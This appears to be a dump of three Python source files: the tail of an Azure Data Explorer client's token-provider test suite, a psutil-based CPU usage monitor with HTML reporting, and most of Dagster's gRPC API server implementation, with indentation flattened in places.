assert TokenConstants.MSAL_ACCESS_TOKEN in token
token = provider.get_token()
assert provider.init_count == 1
good_token = {TokenConstants.MSAL_ACCESS_TOKEN: TOKEN_VALUE}
bad_token1 = None
bad_token2 = {"error": "something bad occurred"}
assert provider._valid_token_or_none(good_token) == good_token
assert provider._valid_token_or_none(bad_token1) is None
assert provider._valid_token_or_none(bad_token2) is None
assert provider._valid_token_or_throw(good_token) == good_token
exception_occurred = False
try:
provider._valid_token_or_throw(bad_token1)
except KustoClientError:
exception_occurred = True
finally:
assert exception_occurred
exception_occurred = False
try:
provider._valid_token_or_throw(bad_token2)
except KustoClientError:
exception_occurred = True
finally:
assert exception_occurred
@staticmethod
def get_token_value(token: dict):
assert token is not None
assert TokenConstants.MSAL_ERROR not in token
value = None
if TokenConstants.MSAL_ACCESS_TOKEN in token:
return token[TokenConstants.MSAL_ACCESS_TOKEN]
elif TokenConstants.AZ_ACCESS_TOKEN in token:
return token[TokenConstants.AZ_ACCESS_TOKEN]
else:
assert False
@staticmethod
def test_fail_async_call():
provider = BasicTokenProvider(token=TOKEN_VALUE)
try:
async_to_sync(provider.get_token_async)()
assert False, "Expected KustoAsyncUsageError to occur"
except KustoAsyncUsageError as e:
assert str(e) == "Method get_token_async can't be called from a synchronous client"
try:
async_to_sync(provider.context_async)()
assert False, "Expected KustoAsyncUsageError to occur"
except KustoAsyncUsageError as e:
assert str(e) == "Method context_async can't be called from a synchronous client"
@staticmethod
def test_basic_provider():
provider = BasicTokenProvider(token=TOKEN_VALUE)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) == TOKEN_VALUE
@staticmethod
def test_basic_provider_in_thread():
exc = []
def inner(exc):
try:
TokenProviderTests.test_basic_provider()
except Exception as e:
exc.append(e)
pass
t = Thread(target=inner, args=(exc,))
t.start()
t.join()
if exc:
raise exc[0]
@staticmethod
def test_callback_token_provider():
provider = CallbackTokenProvider(token_callback=lambda: TOKEN_VALUE, async_token_callback=None)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) == TOKEN_VALUE
provider = CallbackTokenProvider(token_callback=lambda: 0, async_token_callback=None) # token is not a string
exception_occurred = False
try:
provider.get_token()
except KustoClientError:
exception_occurred = True
finally:
assert exception_occurred
@staticmethod
def test_az_provider():
if not TEST_AZ_AUTH:
print(" *** Skipped Az-Cli Provider Test ***")
return
print("Note!\nThe test 'test_az_provider' will fail if 'az login' was not called.")
provider = AzCliTokenProvider(KUSTO_URI)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# another run to pass through the cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
@staticmethod
def test_msi_provider():
if not TEST_MSI_AUTH:
print(" *** Skipped MSI Provider Test ***")
return
user_msi_object_id = os.environ.get("MSI_OBJECT_ID")
user_msi_client_id = os.environ.get("MSI_CLIENT_ID")
# system MSI
provider = MsiTokenProvider(KUSTO_URI)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
if user_msi_object_id is not None:
args = {"object_id": user_msi_object_id}
provider = MsiTokenProvider(KUSTO_URI, args)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped MSI Provider Client Id Test ***")
if user_msi_client_id is not None:
args = {"client_id": user_msi_client_id}
provider = MsiTokenProvider(KUSTO_URI, args)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped MSI Provider Object Id Test ***")
@staticmethod
def test_user_pass_provider():
username = os.environ.get("USER_NAME")
password = os.environ.get("USER_PASS")
auth = os.environ.get("USER_AUTH_ID", "organizations")
if username and password and auth:
provider = UserPassTokenProvider(KUSTO_URI, auth, username, password)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped User & Pass Provider Test ***")
@staticmethod
def test_device_auth_provider():
if not TEST_DEVICE_AUTH:
print(" *** Skipped User Device Flow Test ***")
return
def callback(x):
# break here if you debug this test, and get the code from 'x'
print(x)
provider = DeviceLoginTokenProvider(KUSTO_URI, "organizations", callback)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
@staticmethod
def test_interactive_login():
if not TEST_INTERACTIVE_AUTH:
print(" *** Skipped interactive login Test ***")
return
auth_id = os.environ.get("APP_AUTH_ID", "72f988bf-86f1-41af-91ab-2d7cd011db47")
provider = InteractiveLoginTokenProvider(KUSTO_URI, auth_id)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
@staticmethod
def test_app_key_provider():
# default details are for kusto-client-e2e-test-app
# to run the test, get the key from Azure portal
app_id = os.environ.get("APP_ID", "b699d721-4f6f-4320-bc9a-88d578dfe68f")
auth_id = os.environ.get("APP_AUTH_ID", "72f988bf-86f1-41af-91ab-2d7cd011db47")
app_key = os.environ.get("APP_KEY")
if app_id and app_key and auth_id:
provider = ApplicationKeyTokenProvider(KUSTO_URI, auth_id, app_id, app_key)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped App Id & Key Provider Test ***")
@staticmethod
def test_app_cert_provider():
# default details are for kusto-client-e2e-test-app
        # to run the test, download the certs from Azure Portal
cert_app_id = os.environ.get("CERT_APP_ID", "b699d721-4f6f-4320-bc9a-88d578dfe68f")
cert_auth = os.environ.get("CERT_AUTH", "72f988bf-86f1-41af-91ab-2d7cd011db47")
thumbprint = os.environ.get("CERT_THUMBPRINT")
public_cert_path = os.environ.get("PUBLIC_CERT_PATH")
pem_key_path = os.environ.get("CERT_PEM_KEY_PATH")
if pem_key_path and thumbprint and cert_app_id:
with open(pem_key_path, "rb") as file:
pem_key = file.read()
provider = ApplicationCertificateTokenProvider(KUSTO_URI, cert_app_id, cert_auth, pem_key, thumbprint)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
if public_cert_path:
with open(public_cert_path, "r") as file:
public_cert = file.read()
provider = ApplicationCertificateTokenProvider(KUSTO_URI, cert_app_id, cert_auth, pem_key, thumbprint, public_cert)
token = provider.get_token()
assert TokenProviderTests.get_token_value(token) is not None
# Again through cache
token = provider._get_token_from_cache_impl()
assert TokenProviderTests.get_token_value(token) is not None
else:
print(" *** Skipped App Cert SNI Provider Test ***")
else:
print(" *** Skipped App Cert Provider Test ***")
@staticmethod
def test_cloud_mfa_off():
FAKE_URI = "https://fake_cluster_for_login_mfa_test.kusto.windows.net"
cloud = CloudInfo(
login_endpoint="https://login_endpoint",
login_mfa_required=False,
kusto_client_app_id="1234",
kusto_client_redirect_uri="",
kusto_service_resource_id="https://fakeurl.kusto.windows.net",
first_party_authority_url="",
)
CloudSettings._cloud_cache[FAKE_URI] = cloud
authority = "auth_test"
provider = UserPassTokenProvider(FAKE_URI, authority, "a", "b")
provider._init_once(init_only_resources=True)
context = provider.context()
assert context["authority"] == "https://login_endpoint/auth_test"
assert context["client_id"] == cloud.kusto_client_app_id
assert provider._scopes == ["https://fakeurl.kusto.windows.net/.default"]
@staticmethod
def test_cloud_mfa_on():
FAKE_URI = "https://fake_cluster_for_login_mfa_test.kusto.windows.net"
cloud = CloudInfo(
login_endpoint="https://login_endpoint",
login_mfa_required=True,
kusto_client_app_id="1234",
kusto_client_redirect_uri="",
kusto_service_resource_id="https://fakeurl.kusto.windows.net",
first_party_authority_url="",
)
CloudSettings._cloud_cache[FAKE_URI] = cloud
authority = "auth_test"
provider = UserPassTokenProvider(FAKE_URI, authority, "a", "b")
provider._init_once(init_only_resources=True)
context = provider.context()
assert context["authority"] == "https://login_endpoint/auth_test"
assert context["client_id"] == "1234"
assert provider._scopes == ["https://fakeurl.kustomfa.windows.net/.default"]
|
monitor.py
|
from multiprocessing import Process
from itertools import groupby
import multiprocessing
import os
import time
from typing import Any
import psutil
import datetime
import json
import queue
from jinja2 import Environment, FileSystemLoader
from .template_base import TemplateBase
from .helpers import datetimeConverter
from .scenario_result import ScenarioResult
def getProcessByName(processName: str) -> list[psutil.Process]:
    # Returns all psutil processes whose name contains processName.
    procs: list[psutil.Process] = []
    for proc in psutil.process_iter():
        if processName in proc.name():
            procs.append(proc)
    return procs
def writeDataPoints(data, fileName):
datetimestr = datetime.datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
with open(fileName, 'a+') as f:
f.write(f"{datetimestr}> {json.dumps(data, default=datetimeConverter)}\n")
def getCpuUsageByPid(p: psutil.Process):
    iowait = None
    cpunum = None
    if hasattr(psutil.Process, "cpu_num"):
        cpunum = p.cpu_num()
    cputimes = p.cpu_times()
    cpus_percent = p.cpu_percent()
    if hasattr(cputimes, "iowait"):
        iowait = cputimes.iowait
    return {"pid": p.pid, "cpu": cpus_percent, "iowait": iowait, "core": cpunum}
def runMonitor(q: multiprocessing.Queue):
    fileName = "monitor.txt"
selfPid = os.getpid()
procList = {}
while True:
time.sleep(1)
procs = getProcessByName("python")
datapoint = []
for p in procs:
if p.pid not in procList and p.pid != selfPid:
procList[p.pid] = p
if p.pid != selfPid:
try:
usage = getCpuUsageByPid(procList[p.pid])
datapoint.append(usage)
except Exception as e:
print(f"monitor failed to get cpu usage for pid: {e}")
writeDataPoints(datapoint, fileName)
try:
            q.get(block=False)
break
except queue.Empty:
pass
class Monitor(TemplateBase):
def __init__(self) -> None:
self.signalQueue = multiprocessing.Queue()
self.monitorProcess = Process(daemon=True,target=runMonitor, args=(self.signalQueue,))
def startMonitor(self):
self.monitorProcess.start()
def stopMonitor(self):
self.signalQueue.put("STOP")
self.monitorProcess.join()
def __getAllLines(self, fileName: str):
with open(fileName, "r", encoding='utf8') as fh:
lines = [line.rstrip() for line in fh]
return lines
def __getAllPids(self, taskReport: Any):
pids = []
for key, group in groupby(sorted(taskReport,key=lambda x:x["feature"]), lambda x: x["feature"]):
for t in group:
scenarioResult: ScenarioResult = t["scenario"]
if scenarioResult:
for step in scenarioResult.steps:
if step["pid"] is not None:
pids.append(step["pid"])
return pids
def generateReport(self, taskReport: Any):
templateFileName = "monitor.html"
        dataFile = "monitor.txt"
env = Environment(loader=FileSystemLoader(os.path.dirname(__file__)))
cssContent = self.getTemplatePropertyContent('vis-timeline-graph2d.min.css')
jsContent = self.getTemplatePropertyContent('vis-timeline-graph2d.min.js')
template = env.get_template(templateFileName)
allPids = self.__getAllPids(taskReport)
allPids = list(dict.fromkeys(allPids))
pids = []
allItems = []
dataLines = self.__getAllLines(dataFile)
for line in dataLines:
date = line.split("> ")[0]
item = line.split("> ")[-1]
parsedItem = json.loads(item)
for p in parsedItem:
p["x"] = date
p["y"] = p["cpu"]
p["group"] = "cpu time"
if p["pid"] in allPids:
pids.append(p["pid"])
allItems += parsedItem
pids = list(dict.fromkeys(pids))
#print(f"all pids: {pids}")
#print(f"all itens: {allItems}")
output = template.render(
pids=pids,
css=cssContent,
js=jsContent,
allItems=json.dumps(allItems)
)
self.writeTemplateContent("monitor_output.html",output)
if os.path.exists(dataFile):
os.remove(dataFile)
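# Illustrative usage sketch (assumes the caller owns a task report compatible with
# __getAllPids; names below are hypothetical):
#   monitor = Monitor()
#   monitor.startMonitor()               # samples CPU usage of python processes once per second
#   ...                                  # run the scenarios being measured
#   monitor.stopMonitor()                # signals the sampling process to stop and joins it
#   monitor.generateReport(task_report)  # renders monitor_output.html and removes monitor.txt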
|
server.py
|
import math
import os
import queue
import sys
import tempfile
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.errors import DagsterUserCodeProcessError
from dagster.core.host_representation import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import (
IPCErrorMessage,
ipc_write_stream,
open_ipc_subprocess,
read_unary_response,
)
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class LazyRepositorySymbolsAndCodePointers:
"""Enables lazily loading user code at RPC-time so that it doesn't interrupt startup and
we can gracefully handle user code errors."""
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
if self._loadable_repository_symbols is None:
self.load()
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
if self._code_pointers_by_repo_name is None:
self.load()
return self._code_pointers_by_repo_name
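# Illustrative sketch of the lazy-loading behaviour above (hypothetical `origin`; user code is
# only imported on first property access, not at construction time):
#   symbols = LazyRepositorySymbolsAndCodePointers(origin)  # no user code loaded yet
#   symbols.loadable_repository_symbols                     # triggers load() on first access
#   symbols.code_pointers_by_repo_name                      # reuses the already-loaded result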
def load_loadable_repository_symbols(loadable_target_origin):
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
    # The loadable_target_origin is currently Noneable to support instantiating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
        # Client tells the server to shut down by calling ShutdownServer (or by failing to send a
        # heartbeat), at which point this event is set. The cleanup thread will then set the server
        # termination event once all current executions have finished, which will stop the server.
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._repository_symbols_and_code_pointers = LazyRepositorySymbolsAndCodePointers(
loadable_target_origin
)
if not lazy_load_user_code:
self._repository_symbols_and_code_pointers.load()
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
"Pipeline execution process for {run_id} unexpectedly exited.".format(
run_id=run.run_id
)
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin,
"external_repository_origin",
ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
try:
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
except Exception: # pylint: disable=broad-except
response = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionSetExecutionParamsReply(
serialized_external_partition_set_execution_param_data_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(
float(len(serialized_external_repository_data))
/ STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE
)
)
for i in range(num_chunks):
start_index = i * STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
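    # Worked example of the chunking above (hypothetical size): a 9_000_000-byte payload with
    # STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE = 4_000_000 yields ceil(9/4) = 3 chunks covering
    # [0, 4_000_000), [4_000_000, 8_000_000) and [8_000_000, 9_000_000).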
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalScheduleExecutionReply(
serialized_external_schedule_execution_data_or_external_schedule_execution_error=serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalSensorExecutionReply(
serialized_external_sensor_execution_data_or_external_sensor_execution_error=serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
)
)
)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except: # pylint: disable=bare-except
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except: # pylint: disable=bare-except
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except: # pylint: disable=bare-except
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
time.sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
